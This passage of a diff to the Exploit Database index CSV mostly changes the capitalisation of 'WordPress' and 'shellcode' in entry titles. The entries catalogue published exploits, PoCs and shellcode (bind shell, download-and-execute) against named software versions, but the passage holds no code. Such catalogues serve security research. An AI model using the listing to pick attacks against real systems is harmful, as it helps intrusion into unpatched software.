Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37170,platforms/hardware/remote/37170.rb,"Airties - login-cgi Buffer Overflow",2015-06-01,Metasploit,hardware,remote,0 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 -37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 +37155,platforms/php/webapps/37155.txt,"Wordpress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 - admin/theme.php err Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 - admin/pages.php error Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 - admin/index.php Multiple Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 - admin/upload.php path Parameter Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service",2012-05-14,demonalex,windows,dos,0 -37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 Plugin - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37161,platforms/php/webapps/37161.txt,"Wordpress GRAND Flash Album Gallery 1.71 Plugin - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37162,platforms/php/webapps/37162.txt,"Dynamic Widgets Wordpress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Buffer Overflow PoC",2015-06-01,metacom,windows,remote,0 -37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 +37166,platforms/php/webapps/37166.php,"Wordpress dzs-zoomsounds Plugins 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 37167,platforms/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0 37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution",2015-06-01,Metasploit,hardware,remote,0 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager - Persistent Cross-Site Scripting",2015-06-01,"Cristiano Maruti",hardware,webapps,0 37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37174,platforms/php/webapps/37174.txt,"WordPress Network Publisher 5.0.1 Plugin - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37174,platforms/php/webapps/37174.txt,"Wordpress Network Publisher 5.0.1 Plugin - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37176,platforms/php/webapps/37176.txt,"PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37177,platforms/php/webapps/37177.txt,"CataBlog WordPress Plugin 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37177,platforms/php/webapps/37177.txt,"CataBlog Wordpress Plugin 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37180,platforms/php/webapps/37180.txt,"Wordpress Newsletter Manager Plugin 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0 37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0 -37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQL Injection",2015-06-02,javabudd,php,webapps,0 +37182,platforms/php/webapps/37182.txt,"Wordpress LeagueManager 3.9.11 Plugin - SQL Injection",2015-06-02,javabudd,php,webapps,0 37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0 37187,platforms/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0 37189,platforms/php/webapps/37189.txt,"Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for Wordpress - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for Wordpress - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for WordPress - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37196,platforms/php/webapps/37196.txt,"Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for Wordpress - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37196,platforms/php/webapps/37196.txt,"Pretty Link Lite Wordpress Plugin 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0 -37200,platforms/php/webapps/37200.txt,"WordPress zM Ajax Login & Register Plugin 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 -37201,platforms/php/webapps/37201.txt,"WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37200,platforms/php/webapps/37200.txt,"Wordpress zM Ajax Login & Register Plugin 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 +37201,platforms/php/webapps/37201.txt,"Wordpress Sharebar Plugin 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37203,platforms/php/webapps/37203.txt,"WordPress Soundcloud Is Gold 2.1 Plugin - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37204,platforms/php/webapps/37204.txt,"WordPress Track That Stat 1.0.8 Plugin - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37203,platforms/php/webapps/37203.txt,"Wordpress Soundcloud Is Gold 2.1 Plugin - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37204,platforms/php/webapps/37204.txt,"Wordpress Track That Stat 1.0.8 Plugin - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 37206,platforms/php/webapps/37206.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 - demo/phpThumb.demo.showpic.php title Parameter Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 37207,platforms/php/webapps/37207.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 - demo/phpThumb.demo.random.php dir Parameter Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Parameter Cross-Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 -37209,platforms/php/webapps/37209.txt,"WordPress Really Simple Guest Post 1.0.6 Plugin - File Include",2015-06-05,Kuroi'SH,php,webapps,0 +37209,platforms/php/webapps/37209.txt,"Wordpress Really Simple Guest Post 1.0.6 Plugin - File Include",2015-06-05,Kuroi'SH,php,webapps,0 37211,platforms/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal / Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0 37214,platforms/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",hardware,webapps,0 -37252,platforms/php/webapps/37252.txt,"WordPress RobotCPA Plugin V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80 +37252,platforms/php/webapps/37252.txt,"Wordpress RobotCPA Plugin V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80 37216,platforms/php/webapps/37216.txt,"Unijimpe Captcha - 'captchademo.php' Cross-Site Scripting",2012-05-16,"Daniel Godoy",php,webapps,0 37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0 37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,jsp,dos,0 @@ -33607,16 +33607,16 @@ id,file,description,date,author,platform,type,port 37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php' id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps,0 -37353,platforms/php/webapps/37353.php,"Nmedia WordPress Member Conversation Plugin 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 +37353,platforms/php/webapps/37353.php,"Nmedia Wordpress Member Conversation Plugin 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQL Injection",2015-06-09,Pancaker,php,webapps,0 -37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 +37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC (2)",2015-06-08,"Pawel Wylecial",windows,dos,0 37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 -37243,platforms/php/webapps/37243.txt,"WordPress Wp-ImageZoom 1.1.0 Plugin - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 -37244,platforms/php/webapps/37244.txt,"WordPress Plugin 'WP Mobile Edition' - Local File Inclusion",2015-06-08,"Ali Khalil",php,webapps,0 +37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 Plugin - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 +37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - Local File Inclusion",2015-06-08,"Ali Khalil",php,webapps,0 37245,platforms/php/webapps/37245.txt,"Pasworld - detail.php Blind SQL Injection",2015-06-08,"Sebastian khan",php,webapps,0 37266,platforms/php/webapps/37266.txt,"ClickHeat 1.14 - Change Admin Password Cross-Site Request Forgery",2015-06-12,"David Shanahan",php,webapps,80 37249,platforms/linux/dos/37249.py,"Libmimedir - .VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0 @@ -33646,7 +33646,7 @@ id,file,description,date,author,platform,type,port 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - Cross-Site Request Forgery",2015-06-10,"RedTeam Pentesting",hardware,webapps,80 37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,Metasploit,linux,remote,0 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80 -37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - Cross-Site Request Forgery",2015-06-10,"Nitin Venkatesh",php,webapps,80 +37264,platforms/php/webapps/37264.txt,"Wordpress Encrypted Contact Form Plugin 1.0.4 - Cross-Site Request Forgery",2015-06-10,"Nitin Venkatesh",php,webapps,80 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Privilege Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0 37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 - '.m3u' Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 - Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 @@ -33654,8 +33654,8 @@ id,file,description,date,author,platform,type,port 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80 37271,platforms/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80 37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,jsp,webapps,8080 -37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 Plugin - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80 -37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Plugin - Arbitrary File Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80 +37274,platforms/php/webapps/37274.txt,"Wordpress SE HTML5 Album Audio Player 1.1.0 Plugin - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80 +37275,platforms/php/webapps/37275.txt,"Wordpress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Plugin - Arbitrary File Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80 37277,platforms/php/webapps/37277.txt,"concrete5 - index.php/tools/required/files/search_dialog ocID Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 37278,platforms/php/webapps/37278.txt,"concrete5 - index.php/tools/required/files/customize_search_columns searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 37279,platforms/php/webapps/37279.txt,"concrete5 - index.php/tools/required/files/search_results searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 @@ -33664,11 +33664,11 @@ id,file,description,date,author,platform,type,port 37282,platforms/php/webapps/37282.txt,"concrete5 - index.php/tools/required/files/bulk_properties searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0 37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0 -37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 +37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service",2015-06-15,3unnym00n,windows,dos,0 37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x/3.x/4.x - Client Denial of Service PoC",2015-06-15,LiquidWorm,windows,dos,0 37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,php,webapps,0 -37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (2) (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 +37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh Shellcode (2) (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Authentication Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,windows,dos,0 37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 @@ -33677,9 +33677,9 @@ id,file,description,date,author,platform,type,port 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0 37331,platforms/php/webapps/37331.py,"WHMCS - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0 37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - Cross-Site Request Forgery",2015-06-16,"Jerold Hoong",php,webapps,0 -37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0 +37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader Shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0 37317,platforms/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps,0 -37318,platforms/php/webapps/37318.txt,"PHPList 2.10.9 - 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 +37318,platforms/php/webapps/37318.txt,"phpList 2.10.9 - 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 37319,platforms/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 37320,platforms/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 37321,platforms/php/webapps/37321.txt,"DynPage 1.0 - 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps,0 @@ -33690,11 +33690,11 @@ id,file,description,date,author,platform,type,port 37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 - Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 - Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37328,platforms/php/webapps/37328.php,"Small-Cms - 'hostname' Parameter Remote PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 -37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 -37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 +37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 +37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 Shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 - 'member.php' SQL Injection",2012-06-06,MR.XpR,php,webapps,0 -37356,platforms/php/webapps/37356.txt,"WordPress Email Newsletter Plugin 8.0 - 'option' Parameter Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 -37357,platforms/php/webapps/37357.php,"WordPress VideoWhisper Video Presentation Plugin 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 +37356,platforms/php/webapps/37356.txt,"Wordpress Email Newsletter Plugin 8.0 - 'option' Parameter Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 +37357,platforms/php/webapps/37357.php,"Wordpress VideoWhisper Video Presentation Plugin 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 - Multiple Application Function Cross-Site Request Forgery",2012-05-31,"Shadman Tanjim",php,webapps,0 37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution - (WHMCS) 5.0 knowledgebase.php search Parameter Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps,0 37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 @@ -33711,64 +33711,64 @@ id,file,description,date,author,platform,type,port 37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - .GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 - .Gif Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 - .PNG Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 -37361,platforms/php/webapps/37361.txt,"WordPress Huge-IT Slider 2.7.5 Plugin - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0 -37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 +37361,platforms/php/webapps/37361.txt,"Wordpress Huge-IT Slider 2.7.5 Plugin - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0 +37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection",2015-06-24,cfreer,php,webapps,80 37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute shellcode",2015-06-24,B3mB4m,lin_x86,shellcode,0 -37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 +37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,Metasploit,windows,local,0 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow",2015-06-24,Metasploit,multiple,remote,0 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0 -37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x - 'Upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 -37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0 +37370,platforms/php/webapps/37370.php,"Wordpress FCChat Widget Plugin 2.2.x - 'Upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 +37371,platforms/php/webapps/37371.php,"Wordpress Picturesurf Gallery Plugin - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0 37372,platforms/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0 -37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 +37373,platforms/php/webapps/37373.php,"Wordpress Contus Video Gallery Plugin - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0 37375,platforms/php/webapps/37375.php,"Joomla! Joomsport Component - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0 37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0 -37377,platforms/php/webapps/37377.php,"WordPress HD FLV Player Plugin - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 +37377,platforms/php/webapps/37377.php,"Wordpress HD FLV Player Plugin - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 